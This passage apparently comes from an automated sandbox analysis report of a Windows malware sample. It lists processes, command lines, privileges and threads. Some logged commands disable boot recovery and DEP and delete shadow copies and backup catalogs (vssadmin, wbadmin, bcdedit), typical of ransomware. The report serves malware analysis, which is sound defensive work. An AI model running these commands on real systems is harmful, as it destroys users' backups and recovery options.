[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x8c4 Process: id = "11" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x6e61a000" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x83c" cmd_line = "bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0x8c0 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x6de0d000" os_pid = "0x8b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x738" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0x570 Thread: id = 37 os_tid = 0x8b0 Thread: id = 38 os_tid = 0x8b8 Thread: id = 39 os_tid = 0x8a0 Thread: id = 40 os_tid = 0x8d4 Thread: id = 44 os_tid = 0x62c Process: id = "13" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x6c3c0000" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x6d0" cmd_line = "bcdedit.exe /set {current} nx AlwaysOff" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0x8ac Process: id = "14" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x6df0d000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x4f0" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 36 os_tid = 0x8cc Thread: id = 42 os_tid = 0x8e4 Thread: id = 43 os_tid = 0xc4 Thread: id = 45 os_tid = 0x310 Thread: id = 46 os_tid = 0x7b0 Thread: id = 47 os_tid = 0x774 Process: id = "15" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x6ce76000" os_pid = "0x3b0" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x8b4" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000562a7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 48 os_tid = 0x5f4 Thread: id = 49 os_tid = 0x320 Thread: id = 50 os_tid = 0x318 Thread: id = 51 os_tid = 0x2c8 [0104.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc6d990 | out: lpSystemTimeAsFileTime=0xc6d990*(dwLowDateTime=0x903b9230, dwHighDateTime=0x1d5956e)) [0104.612] GetCurrentProcessId () returned 0x3b0 [0104.612] GetCurrentThreadId () returned 0x2c8 [0104.612] GetTickCount () returned 0x11535ef [0104.612] QueryPerformanceCounter (in: lpPerformanceCount=0xc6d998 | out: lpPerformanceCount=0xc6d998*=22489746538) returned 1 [0104.613] malloc (_Size=0x100) returned 0x188e80 Thread: id = 52 os_tid = 0x240 Thread: id = 53 os_tid = 0x780 Thread: id = 54 os_tid = 0x518 Thread: id = 62 os_tid = 0x2b4 Thread: id = 138 os_tid = 0x928 Thread: id = 154 os_tid = 0x9ec Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 63 os_tid = 0x288 Thread: id = 64 os_tid = 0xbf8 Thread: id = 65 os_tid = 0xbdc Thread: id = 66 os_tid = 0xb14 Thread: id = 67 os_tid = 0xb10 Thread: id = 68 os_tid = 0xb08 Thread: id = 69 os_tid = 0xb04 Thread: id = 70 os_tid = 0x430 Thread: id = 71 os_tid = 0x268 Thread: id = 72 os_tid = 0x768 Thread: id = 73 os_tid = 0x760 Thread: id = 74 os_tid = 0x70c Thread: id = 75 os_tid = 0x6e8 Thread: id = 76 os_tid = 0x6c0 Thread: id = 77 os_tid = 0x6b8 Thread: id = 78 os_tid = 0x6a4 Thread: id = 79 os_tid = 0x6a0 Thread: id = 80 os_tid = 0x690 Thread: id = 81 os_tid = 0x67c Thread: id = 82 os_tid = 0x490 Thread: id = 83 os_tid = 0x454 Thread: id = 84 os_tid = 0x450 Thread: id = 85 os_tid = 0x428 Thread: id = 86 os_tid = 0x420 Thread: id = 87 os_tid = 0x404 Thread: id = 88 os_tid = 0x18c Thread: id = 89 os_tid = 0xf0 Thread: id = 90 os_tid = 0x3f0 Thread: id = 91 os_tid = 0x3e4 Thread: id = 92 os_tid = 0x398 Thread: id = 93 os_tid = 0x394 Thread: id = 94 os_tid = 0x390 Thread: id = 95 os_tid = 0x38c Thread: id = 96 os_tid = 0x378 Thread: id = 97 os_tid = 0x370 Thread: id = 112 os_tid = 0x890 Thread: id = 120 os_tid = 0x61c Thread: id = 121 os_tid = 0x8e8 Thread: id = 122 os_tid = 0x640 Thread: id = 123 os_tid = 0x55c Thread: id = 147 os_tid = 0x95c Thread: id = 165 os_tid = 0xa14 Thread: id = 166 os_tid = 0x9f4 Thread: id = 169 os_tid = 0xb40 Thread: id = 170 os_tid = 0x740 Process: id = "17" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65507000" os_pid = "0x840" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 98 os_tid = 0xb0c Thread: id = 99 os_tid = 0x860 Thread: id = 100 os_tid = 0x85c Thread: id = 101 os_tid = 0x858 Thread: id = 102 os_tid = 0x854 Thread: id = 103 os_tid = 0x850 Thread: id = 104 os_tid = 0x848 Thread: id = 105 os_tid = 0x844 Thread: id = 137 os_tid = 0x940 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6b687000" os_pid = "0x7a8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x3b0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00056c29" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 106 os_tid = 0x898 Thread: id = 107 os_tid = 0x818 Thread: id = 108 os_tid = 0x824 Thread: id = 109 os_tid = 0x820 Thread: id = 110 os_tid = 0x81c Thread: id = 111 os_tid = 0x7c4 Thread: id = 139 os_tid = 0x920 Thread: id = 153 os_tid = 0x9e8 Process: id = "19" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x6f382000" os_pid = "0x7c8" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x8a8" cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00056587" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 113 os_tid = 0x7d4 Thread: id = 114 os_tid = 0x7bc Thread: id = 115 os_tid = 0x244 Thread: id = 116 os_tid = 0x5b0 Thread: id = 117 os_tid = 0x53c Thread: id = 118 os_tid = 0x7e8 Thread: id = 119 os_tid = 0x11c Thread: id = 150 os_tid = 0x8ec Process: id = "20" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6bc26000" os_pid = "0x808" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00057834" [0xc000000f] Thread: id = 124 os_tid = 0x80c Thread: id = 125 os_tid = 0x878 Thread: id = 126 os_tid = 0x86c Thread: id = 127 os_tid = 0x868 Thread: id = 128 os_tid = 0x864 Thread: id = 129 os_tid = 0x8fc Thread: id = 130 os_tid = 0x33c Thread: id = 152 os_tid = 0x918 Thread: id = 167 os_tid = 0x330 Thread: id = 168 os_tid = 0xb1c Process: id = "21" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x6b520000" os_pid = "0x648" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x7c8" cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00056587" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 131 os_tid = 0x870 Thread: id = 132 os_tid = 0x874 Thread: id = 133 os_tid = 0x87c Thread: id = 134 os_tid = 0x110 Thread: id = 135 os_tid = 0x64 Thread: id = 136 os_tid = 0x644 Process: id = "22" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x5f38d000" os_pid = "0x958" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x648" cmd_line = "C:\\Windows\\System32\\vds.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057e4b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 140 os_tid = 0x91c Thread: id = 141 os_tid = 0x950 Thread: id = 142 os_tid = 0x924 Thread: id = 143 os_tid = 0x938 Thread: id = 144 os_tid = 0x990 Thread: id = 145 os_tid = 0x944 Thread: id = 146 os_tid = 0x968 Thread: id = 148 os_tid = 0x9b4 Thread: id = 149 os_tid = 0x8dc Thread: id = 151 os_tid = 0x9c4 Thread: id = 155 os_tid = 0x910 Thread: id = 156 os_tid = 0xa1c Thread: id = 157 os_tid = 0xa20 Thread: id = 158 os_tid = 0x98c Thread: id = 159 os_tid = 0xa28 Thread: id = 160 os_tid = 0x988 Thread: id = 161 os_tid = 0x984 Thread: id = 163 os_tid = 0x998 Process: id = "23" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 171 os_tid = 0x8 Thread: id = 172 os_tid = 0x60 Thread: id = 173 os_tid = 0x7c Thread: id = 174 os_tid = 0xc4 Thread: id = 175 os_tid = 0xc8 Thread: id = 176 os_tid = 0x50 Thread: id = 177 os_tid = 0x28 Thread: id = 178 os_tid = 0x44 Thread: id = 179 os_tid = 0x34 Thread: id = 180 os_tid = 0x38 Thread: id = 181 os_tid = 0x3c Thread: id = 182 os_tid = 0x40 Thread: id = 183 os_tid = 0xa0 Thread: id = 184 os_tid = 0xd0 Thread: id = 185 os_tid = 0xc Thread: id = 186 os_tid = 0xbc Thread: id = 187 os_tid = 0xd4 Thread: id = 188 os_tid = 0xd8 Thread: id = 189 os_tid = 0xdc Thread: id = 190 os_tid = 0xe8 Thread: id = 191 os_tid = 0xec Thread: id = 192 os_tid = 0x4c Thread: id = 193 os_tid = 0x68 Thread: id = 194 os_tid = 0x30 Thread: id = 195 os_tid = 0xb4 Thread: id = 196 os_tid = 0xfc Thread: id = 197 os_tid = 0x100 Thread: id = 198 os_tid = 0x10c Thread: id = 199 os_tid = 0x104 Thread: id = 200 os_tid = 0x108 Thread: id = 201 os_tid = 0x110 Thread: id = 202 os_tid = 0x88 Thread: id = 203 os_tid = 0x84 Thread: id = 204 os_tid = 0x9c Thread: id = 205 os_tid = 0x90 Thread: id = 206 os_tid = 0x128 Thread: id = 207 os_tid = 0x12c Thread: id = 208 os_tid = 0x130 Thread: id = 209 os_tid = 0x134 Thread: id = 210 os_tid = 0x138 Thread: id = 211 os_tid = 0x94 Thread: id = 212 os_tid = 0x174 Thread: id = 213 os_tid = 0x6c Thread: id = 214 os_tid = 0x78 Thread: id = 215 os_tid = 0x268 Thread: id = 216 os_tid = 0x2dc Thread: id = 217 os_tid = 0x8c Thread: id = 218 os_tid = 0x3b4 Thread: id = 219 os_tid = 0x240 Thread: id = 220 os_tid = 0x20 Thread: id = 221 os_tid = 0x98 Thread: id = 222 os_tid = 0x478 Thread: id = 223 os_tid = 0x570 Thread: id = 224 os_tid = 0x24 Thread: id = 225 os_tid = 0x5d0 Thread: id = 226 os_tid = 0x5ec Thread: id = 227 os_tid = 0x5f0 Thread: id = 228 os_tid = 0x63c Thread: id = 229 os_tid = 0x6a4 Thread: id = 230 os_tid = 0x6b0 Thread: id = 231 os_tid = 0x6c4 Thread: id = 232 os_tid = 0x6cc Thread: id = 233 os_tid = 0x6d0 Thread: id = 234 os_tid = 0x6d8 Thread: id = 235 os_tid = 0x2c Thread: id = 236 os_tid = 0x480 Thread: id = 237 os_tid = 0x77c Thread: id = 238 os_tid = 0x47c Thread: id = 239 os_tid = 0x7c0 Thread: id = 240 os_tid = 0x0 Thread: id = 241 os_tid = 0x380 Thread: id = 242 os_tid = 0x64 Thread: id = 243 os_tid = 0x4ec Thread: id = 244 os_tid = 0xa4 Thread: id = 245 os_tid = 0xc0